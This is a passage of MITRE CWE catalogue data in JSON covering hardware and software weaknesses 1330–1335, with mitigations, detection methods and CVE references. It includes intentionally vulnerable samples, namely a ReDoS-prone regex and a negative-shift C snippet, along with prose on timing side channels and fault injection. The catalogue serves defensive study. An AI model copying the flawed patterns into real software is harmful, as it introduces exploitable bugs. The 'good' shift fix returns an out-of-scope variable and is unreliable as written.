Maintainability"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify requirements that each component should be updateable."},{"Phase":"Architecture and Design","Description":"Design the product to allow for updating of its components. Consider the infrastructure that might be necessary to support updates."},{"Phase":"Implementation","Description":"Implement the necessary functionality to allow each component to be updated."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-145"},"Intro_Text":"A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes.","Example_Code":[{"#text":"The refrigerator has no means of patching and is hacked becoming a spewer of email spam.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The device automatically patches itself and provides considerable more protection against being hacked.","attr":{"@_Nature":"good","@_Language":"Other"}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-146"},"Intro_Text":{"xhtml:p":"A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch."},"Body_Text":"ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1197","@_Section":"Executive Summary"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-12-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, References"}}},"1330":{"attr":{"@_ID":"1330","@_Name":"Remanent Data Readable after Memory Erase","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Confidential information stored in memory circuits is readable or recoverable after being cleared or erased.","Extended_Description":{"xhtml:p":["Data remanence occurs when stored, memory content is not fully lost after a memory-clear or -erase operation. Confidential memory contents can still be readable through data remanence in the hardware.","Data remanence can occur because of performance optimization or memory organization during \'clear\' or \'erase\' operations, like a design that allows the memory-organization metadata (e.g., file pointers) to be erased without erasing the actual memory content. To protect against this weakness, memory devices will often support different commands for optimized memory erase and explicit secure erase.","Data remanence can also happen because of the physical properties of memory circuits in use. For example, static, random-access-memory (SRAM) and dynamic, random-access-memory (DRAM) data retention is based on the charge retained in the memory cell, which depends on factors such as power supply, refresh rates, and temperature.","Other than explicit erase commands, self-encrypting, secure-memory devices can also support secure erase through cryptographic erase commands. In such designs, only the decryption keys for encrypted data stored on the device are erased. That is, the stored data are always remnant in the media after a cryptographic erase. However, only the encrypted data can be extracted. Thus, protection against data recovery in such designs relies on the strength of the encryption algorithm."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1301","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1301","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Modify Memory","Read Memory"],"Note":"Confidential data are readable to untrusted agent."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:ol":{"xhtml:li":["Testing of memory-device contents after clearing or erase commands.","Dynamic analysis of memory contents during device operation to detect specific, confidential assets.","Architecture and design analysis of memory clear and erase operations."]}}},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:ol":{"xhtml:li":["Testing of memory-device contents after clearing or erase commands.","Dynamic analysis of memory contents during device operation to detect specific, confidential assets.","Architecture and design analysis of memory clear and erase operations."]}}}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:ol":{"xhtml:li":["Support for secure-erase commands that apply multiple cycles of overwriting memory with known patterns and of erasing actual content.","Support for cryptographic erase in self-encrypting, memory devices.","External, physical tools to erase memory such as ultraviolet-rays-based erase of Electrically erasable, programmable, read-only memory (EEPROM).","Physical destruction of media device. This is done for repurposed or scrapped devices that are no longer in use."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a device that uses flash memory for non-volatile-data storage. To optimize flash-access performance or reliable-flash lifetime, the device might limit the number of flash writes/erases by maintaining some state in internal SRAM and only committing changes to flash memory periodically.","Body_Text":["The device also supports user reset to factory defaults with the expectation that all personal information is erased from the device after this operation. On factory reset, user files are erased using explicit, erase commands supported by the flash device.","In the given, system design, the flash-file system can support performance-optimized erase such that only the file metadata are erased and not the content. If this optimized erase is used for files containing user data during factory-reset flow, then device, flash memory can contain remanent data from these files.","On device-factory reset, the implementation might not erase these copies, since the file organization has changed and the flash file system does not have the metadata to track all previous copies.","A flash-memory region that is used by a flash-file system should be fully erased as part of the factory-reset flow. This should include secure-erase flow for the flash media such as overwriting patterns multiple times followed by erase."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-8575","Description":"Firmware Data Deletion Vulnerability in which a base station factory reset might not delete all user information. The impact of this enables a new owner of a used device that has been \\"factory-default reset\\" with a vulnerable firmware version can still retrieve, at least, the previous owner\'s wireless network name, and the previous owner\'s wireless security (such as WPA2) key. This issue was addressed with improved, data deletion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8575"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1154"}}},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-10"}}},"1331":{"attr":{"@_ID":"1331","@_Name":"Improper Isolation of Shared Resources in Network On Chip (NoC)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The Network On Chip (NoC) does not isolate or incorrectly isolates its on-chip-fabric and internal resources such that they are shared between trusted and untrusted agents, creating timing channels.","Extended_Description":{"xhtml:p":"Typically, network on chips (NoC) have many internal resources that are shared between packets from different trust domains. These resources include internal buffers, crossbars and switches, individual ports, and channels. The sharing of resources causes contention and introduces interference between differently trusted domains, which poses a security threat via a timing channel, allowing attackers to infer data that belongs to a trusted agent. This may also result in introducing network interference, resulting in degraded throughput and latency."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"653","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1189","@_View_ID":"1194"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":{"xhtml:p":"\\"Network-on-chip\\" (NoC) is a commonly-used term used for hardware interconnect fabrics used by multicore Systems-on-Chip (SoC).  Communication between modules on the chip uses packet-based methods, with improved efficiency and scalability compared to bus architectures [REF-1241]."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability"],"Impact":["DoS: Resource Consumption (Other)","Varies by Context","Other"],"Likelihood":"Medium","Note":"Attackers may infer data that belongs to a trusted agent; the methods used to perform this attack may result in noticeably increased resource consumption."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Providing marker flags to send through the interfaces coupled with examination of which users are able to read or manipulate the flags will help verify that the proper isolation has been achieved and is effective.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a NoC that implements a one-dimensional mesh network with four nodes. This supports two flows: Flow A from node 0 to node 3 (via node 1 and node 2) and Flow B from node 1 to node 2. Flows A and B share a common link between Node 1 and Node 2.  Only one flow can use the link in each cycle.","Body_Text":["One of the masters to this NoC implements a cryptographic algorithm (RSA), and another master to the NoC is a core that can be exercised by an attacker. The RSA algorithm performs a modulo multiplication of two large numbers and depends on each bit of the secret key. The algorithm examines each bit in the secret key and only performs multiplication if the bit is 1. This algorithm is known to be prone to timing attacks. Whenever RSA performs multiplication, there is additional network traffic to the memory controller. One of the reasons for this is cache conflicts.","Since this is a one-dimensional mesh, only one flow can use the link in each cycle.  Also, packets from the attack program and the RSA program share the output port of the network-on-chip.  This contention results in network interference, and the throughput and latency of one flow can be affected by the other flow\'s demand.","There may be different ways to fix this particular weakness."],"Example_Code":[{"#text":"The attacker runs a loop program on the core they control, and this causes a cache miss in every iteration for the RSA algorithm. Thus, by observing network-traffic bandwidth and timing, the attack program can determine when the RSA algorithm is doing a multiply operation (i.e., when the secret key bit is 1) and eventually extract the entire, secret key.","attr":{"@_Nature":"attack"}},{"#text":"Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"124"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1155"}},{"attr":{"@_External_Reference_ID":"REF-1241"}},{"attr":{"@_External_Reference_ID":"REF-1242"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-23"},"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided references and background information"}}},"1332":{"attr":{"@_ID":"1332","@_Name":"Improper Handling of Faults that Lead to Instruction Skips","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device is missing or incorrectly implements circuitry or sensors that detect and mitigate the skipping of security-critical CPU instructions when they occur.","Extended_Description":{"xhtml:p":["The operating conditions of hardware may change\\n              in ways that cause unexpected behavior to occur,\\n              including the skipping of security-critical CPU\\n              instructions. Generally, this can occur due to\\n              electrical disturbances or when the device operates\\n              outside of its expected conditions.","In practice, application code may contain\\n\\t\\t\\t  conditional branches that are security-sensitive (e.g.,\\n\\t\\t\\t  accepting or rejecting a user-provided password). These\\n\\t\\t\\t  conditional branches are typically implemented by a\\n\\t\\t\\t  single conditional branch instruction in the program\\n\\t\\t\\t  binary which, if skipped, may lead to effectively\\n\\t\\t\\t  flipping the branch condition - i.e., causing the wrong\\n\\t\\t\\t  security-sensitive branch to be taken. This affects\\n\\t\\t\\t  processes such as firmware authentication, password\\n\\t\\t\\t  verification, and other security-sensitive decision\\n\\t\\t\\t  points.","Attackers can use fault injection techniques to\\n\\t\\t\\t  alter the operating conditions of hardware so that\\n\\t\\t\\t  security-critical instructions are skipped more\\n\\t\\t\\t  frequently or more reliably than they would in a\\n\\t\\t\\t  \\"natural\\" setting."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1247","@_View_ID":"1194","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Failure to design appropriate countermeasures to common fault injection techniques can manifest this weakness."},{"Phase":"Implementation","Note":"This weakness can arise if the hardware design incorrectly implements countermeasures to prevent fault injection."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Authentication"],"Impact":["Bypass Protection Mechanism","Alter Execution Logic","Unexpected State"],"Likelihood":"High","Note":"Depending on the context, instruction skipping can\\n                        have a broad range of consequences related to the\\n                        generic bypassing of security critical code."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"This weakness can be found using automated static analysis once a developer has indicated which code paths are critical to protect.","Effectiveness":"Moderate"},{"Method":"Simulation / Emulation","Description":"This weakness can be found using automated dynamic analysis. Both emulation of a CPU with instruction skips, as well as RTL simulation of a CPU IP, can indicate parts of the code that are sensitive to faults due to instruction skips.","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":"This weakness can be found using manual (static) analysis. The analyst has security objectives that are matched against the high-level code. This method is less precise than emulation, especially if the analysis is done at the higher level language rather than at assembly level.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design strategies for ensuring safe failure if inputs such as Vcc are modified out of acceptable ranges."},{"Phase":"Architecture and Design","Description":"Design strategies for ensuring safe behavior if instructions attempt to be skipped."},{"Phase":"Implementation","Description":"Ensure that architected fault mitigations are\\n                        strong enough in practice. For example, a low power\\n                        detection mechanism that takes 50 clock cycles to\\n                        trigger at lower voltages may be an insufficient security mechanism if the instruction counter\\n                        has already progressed with no other CPU activity occurring."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A smart card contains authentication credentials that are used as authorization to enter a building. The credentials are only accessible when a correct PIN is presented to the card.","Example_Code":[{"#text":"The card emits the credentials when a voltage anomaly is injected into the power line to the device at a particular time after providing an incorrect PIN to the card, causing the internal program to accept the incorrect PIN.","attr":{"@_Nature":"bad"}},{"attr":{"@_Nature":"good"},"xhtml:ul":{"xhtml:li":["add an internal filter or internal power supply in series with the power supply pin on the device","add sensing circuitry to reset the device if out of tolerance conditions are detected","add additional execution sensing circuits to monitor the execution order for anomalies and abort the action or reset the device under fault conditions"]}}],"Body_Text":"There are several ways this weakness could be fixed."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-15894","Description":"fault injection attack bypasses the verification mode, potentially allowing arbitrary code execution.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15894"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1160"}},{"attr":{"@_External_Reference_ID":"REF-1161"}},{"attr":{"@_External_Reference_ID":"REF-1222"}},{"attr":{"@_External_Reference_ID":"REF-1223"}},{"attr":{"@_External_Reference_ID":"REF-1224"}}]},"Content_History":{"Submission":{"Submission_Name":"Jasper van Woudenberg","Submission_Organization":"Riscure","Submission_Date":"2020-10-14"},"Modification":[{"Modification_Name":"Jasper van Woudenberg","Modification_Organization":"Riscure","Modification_Date":"2021-01-11"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Functional_Areas, Potential_Mitigations, References"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Jasper van Woudenberg","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods and feedback on demonstrative example"}}},"1333":{"attr":{"@_ID":"1333","@_Name":"Inefficient Regular Expression Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles.","Extended_Description":{"#text":"Some regular expression engines have a feature called \\"backtracking\\". If the token cannot match, the engine \\"backtracks\\" to a position that may result in a different token that can match.Backtracking becomes a weakness if all of these conditions are met:","xhtml:br":["",""],"xhtml:ul":{"xhtml:li":["The number of possible backtracking attempts are exponential relative to the length of the input.","The input can fail to match the regular expression.","The input can be long enough."]},"xhtml:p":"Attackers can create crafted inputs that\\n\\t\\t  intentionally cause the regular expression to use\\n\\t\\t  excessive backtracking in a way that causes the CPU\\n\\t\\t  consumption to spike."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"407","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"ReDoS","Description":"ReDoS is an abbreviation of \\"Regular expression Denial of Service\\"."},{"Term":"Regular Expression Denial of Service","Description":"While this term is attack-focused, this is commonly used to describe the weakness."},{"Term":"Catastrophic backtracking","Description":"This term is used to describe the behavior of the regular expression as a negative technical impact."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A RegEx can be easy to create and read using unbounded matching characters, but the programmer might not consider the risk of  excessive backtracking."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.","Effectiveness":"High","Effectiveness_Notes":"This is one of the few effective solutions when using user-provided regular expressions."},{"Phase":"System Configuration","Description":"Configure backtracking limits in the configuration of the regular expression implementation, such as PHP\'s pcre.backtrack_limit. Also consider limits on execution time for the process.","Effectiveness":"Moderate"},{"Phase":"Implementation","Description":"Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Limit the length of the input that the regular expression will process.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example attempts to check if an input string is a \\"sentence\\" [REF-1164].","Example_Code":[{"#text":"var test_string = \\"Bad characters: $@#\\";var bad_pattern  = /^(\\\\w+\\\\s?)*$/i;var result = test_string.search(bad_pattern);","attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:br":["",""]},{"#text":"var test_string = \\"Bad characters: $@#\\";var good_pattern  = /^((?=(\\\\w+))\\\\2\\\\s?)*$/i;var result = test_string.search(good_pattern);","attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:br":["",""]}],"Body_Text":[{"xhtml:p":["The regular expression has a vulnerable backtracking clause inside (\\\\w+\\\\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases.","To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \\\\2 which prevents the backtracking. The modified example is:"]},"Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx."]},{"Intro_Text":"This example attempts to check if an input string is a \\"sentence\\" and is modified for Perl [REF-1164].","Example_Code":[{"#text":"my $test_string = \\"Bad characters: \\\\$\\\\@\\\\#\\";my $bdrslt = $test_string;$bdrslt =~ /^(\\\\w+\\\\s?)*$/i;","attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:br":["",""]},{"#text":"my $test_string = \\"Bad characters: \\\\$\\\\@\\\\#\\";my $gdrslt = $test_string;$gdrslt =~ /^((?=(\\\\w+))\\\\2\\\\s?)*$/i;","attr":{"@_Nature":"good","@_Language":"Perl"},"xhtml:br":["",""]}],"Body_Text":[{"xhtml:p":["The regular expression has a vulnerable backtracking clause inside (\\\\w+\\\\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases.","To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \\\\2 which prevents the backtracking. The modified example is:"]},"Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-16215","Description":"Markdown parser uses inefficient regex when processing a message, allowing users to cause CPU consumption and delay preventing processing of other messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16215"},{"Reference":"CVE-2019-6785","Description":"Long string in a version control product allows DoS due to an inefficient regex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6785"},{"Reference":"CVE-2019-12041","Description":"Javascript code allows ReDoS via a long string due to excessive backtracking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12041"},{"Reference":"CVE-2015-8315","Description":"ReDoS when parsing time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8315"},{"Reference":"CVE-2015-8854","Description":"ReDoS when parsing documents.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8854"},{"Reference":"CVE-2017-16021","Description":"ReDoS when validating URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16021"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"492"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1180"}},{"attr":{"@_External_Reference_ID":"REF-1162"}},{"attr":{"@_External_Reference_ID":"REF-1163"}},{"attr":{"@_External_Reference_ID":"REF-1164"}},{"attr":{"@_External_Reference_ID":"REF-1165"}},{"attr":{"@_External_Reference_ID":"REF-1166"}},{"attr":{"@_External_Reference_ID":"REF-1167"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous External Contributor","Submission_Date":"2021-01-17"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}}},"1334":{"attr":{"@_ID":"1334","@_Name":"Unauthorized Error Injection Can Degrade Hardware Redundancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode.","Extended_Description":{"xhtml:p":"To ensure the performance and functional reliability of certain components, hardware designers can implement hardware blocks for redundancy in the case that others fail. This redundant block can be prevented from performing as intended if the design allows unauthorized agents to inject errors into it. In this way, a path with injected errors may become unavailable to serve as a redundant channel. This may put the system into a degraded mode of operation which could be exploited by a subsequent attack."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."},{"Phase":"Integration","Note":"Such issues could be introduced during integration and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","Quality Degradation","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Reduce Performance","Reduce Reliability","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure the design does not allow error injection in modes intended for normal run-time operation. Provide access controls on interfaces for injecting errors."},{"Phase":"Implementation","Description":"Disallow error injection in modes which are expected to be used for normal run-time operation. Provide access controls on interfaces for injecting errors."},{"Phase":"Integration","Description":"Add an access control layer atop any unprotected interfaces for injecting errors."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"Content_History":{"Submission":{"Submission_Name":"James Pangburn","Submission_Organization":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Date":"2020-07-29"}}},"1335":{"attr":{"@_ID":"1335","@_Name":"Incorrect Bitwise Shift of Integer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An integer value is specified to be shifted by a negative amount or an amount greater than or equal to the number of bits contained in the value causing an unexpected or indeterminate result.","Extended_Description":{"xhtml:p":["Specifying a value to be shifted by a negative amount is undefined in various languages. Various computer architectures implement this action in different ways. The compilers and interpreters when generating code to accomplish a shift generally do not do a check for this issue.","Specifying an over-shift, a shift greater than or equal to the number of bits contained in a value to be shifted, produces a result which varies by architecture and compiler. In some languages, this action is specifically listed as producing an undefined result."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Adding shifts without properly verifying the size and sign of the shift amount."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implicitly or explicitly add checks and mitigation for negative or over-shift values."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A negative shift amount for an x86 or x86_64 shift instruction will produce the number of bits to be shifted by taking a 2\'s-complement of the shift amount and effectively masking that amount to the lowest 6 bits for a 64 bit shift instruction.","Example_Code":[{"#text":"unsigned int r = 1 &lt;&lt; -5;","attr":{"@_Nature":"bad","@_Language":"C"}},{"#text":"int choose_bit(int reg_bit, int bit_number_from_elsewhere){if (NEED_TO_SHIFT){reg_bit -= bit_number_from_elsewhere;}return reg_bit;}unsigned int handle_io_register(unsigned int *r){unsigned int the_bit = 1 &lt;&lt; choose_bit(5, 10);*r |= the_bit;return the_bit;}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","","","","","","","","",""]},{"#text":"int choose_bit(int reg_bit, int bit_number_from_elsewhere){if (NEED_TO_SHIFT){reg_bit -= bit_number_from_elsewhere;}return reg_bit;}unsigned int handle_io_register(unsigned int *r){int the_bit_number = choose_bit(5, 10);if ((the_bit_number &gt; 0) &amp;&amp; (the_bit_number &lt; 63)){unsigned int the_bit = 1 &lt;&lt; the_bit_number;*r |= the_bit;}return the_bit;}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","","","","","","","","","","","","","",""]}],"Body_Text":["The example above ends up with a shift amount of -5. The hexadecimal value is FFFFFFFFFFFFFFFD which, when bits above the  6th bit are masked off, the shift amount becomes a binary shift value of 111101 which is 61 decimal. A shift of 61 produces a very different result than -5. The previous example is a very simple version of the following code which is probably more realistic of what happens in a real system.","Note that the good example not only checks for negative shifts and disallows them but also for over-shifts. Not bit operation is done if the shift is out of bounds. Depending on the program, perhaps an error message should be logged."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-4307","Description":"An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4307"},{"Reference":"CVE-2012-2100","Description":"An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero - fix of CVE-2009-4307.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2100"},{"Reference":"CVE-2020-8835","Description":"An overshift in a kernel a allowed out of bounds reads and writes resulting in a root takeover.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8835"},{"Reference":"CVE-2015-1607","Description":"Program is  not properly handling signed bitwise left-shifts causing an overlapping memcpy memory range error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1607"},{"Reference":"CVE-2016-9842","Description":"Compression function improperly executes a signed left shift of a negative integer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9842"},{"Reference":"CVE-2018-18445","Description":"Some kernels improperly handle right shifts of 32 bit numbers in a 64 bit register.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18445"},{"Reference":"CVE-2013-4206","Description":"Putty  has an 